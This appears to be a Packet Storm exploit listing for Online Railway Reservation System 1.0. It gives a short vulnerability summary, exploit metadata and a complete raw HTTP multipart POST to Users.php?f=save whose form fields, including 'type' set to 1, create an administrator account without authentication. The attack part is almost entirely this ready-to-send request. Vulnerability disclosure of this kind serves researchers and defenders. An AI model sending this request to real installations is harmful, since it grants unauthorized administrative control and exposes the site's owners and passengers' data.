Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
6e4b17431a06225179106cc2be02dcbc7de9bcd723fe818fa7c839154bf47af2#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"
1
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed